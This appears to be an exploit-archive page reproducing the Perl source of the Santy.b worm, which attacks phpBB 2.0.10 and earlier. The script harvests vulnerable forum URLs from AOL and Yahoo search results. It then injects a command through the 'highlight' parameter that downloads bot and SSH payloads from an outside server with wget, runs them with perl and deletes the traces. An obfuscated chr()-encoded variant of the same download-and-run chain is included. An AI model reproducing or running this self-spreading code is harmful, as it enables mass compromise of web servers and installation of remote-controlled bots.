exploits , vulnerabilities , articles , Santy.b - phpBB <= 2.0.10 File Upload (Using AOL/Yahoo Search)

#/usr/bin/perl

use IO::Socket;
use LWP::Simple;
@vul = "";
$a=0;
$numero = int rand(999);
$site = "search.aol.com";
$procura = "viewtopic.php%3Ft%3D$numero";

######################################
for($n=0;$n<90;$n += 10){
$sock =
IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp")
or next;
print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n
HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{if ($uber !~ /cache/)
{if ($uber !~ /"/)
{if ($uber !~ /google/)
{if ($uber !~ /216/)
{if ($uber =~/http/)
{if ($uber !~ /start=/)
{
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++;
}}}}}}}}}
##########################
for($cadenu=1;$cadenu <= 99; $cadenu +=10){

@cade =
get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=
1&b=$cadenu") or next;
$ae = "@cade";

while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;

$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
$uber =~ s/<wbr>//g;

if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++
}}

#########################


#$cmd =
'&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)
%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%2
52echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252e
chr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr
(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr
(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)%
252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252
echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr
(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)
%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252
echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr
(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)
%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr'.'(99)%252echr(111)%25
2echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr
(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%25
2echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';

$cmd = '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;wget 
server.org/pdf/bot;perl bot;wget server.org/pdf/ssh.a;perl ssh.a;rm -rf
ssh.*;rm -rf bot*%3B%
20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72
%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5
D%29.%2527';

$b = scalar(@vul);

for($a=0;$a<=$b;$a++)
{

$sitevul = $vul[$a].$cmd;
if($sitevul !~/http/){ $sitevul = 'http://'.$sitevul; }
$res = get($sitevul) or next;
}


securitydot.net - 2004-12-25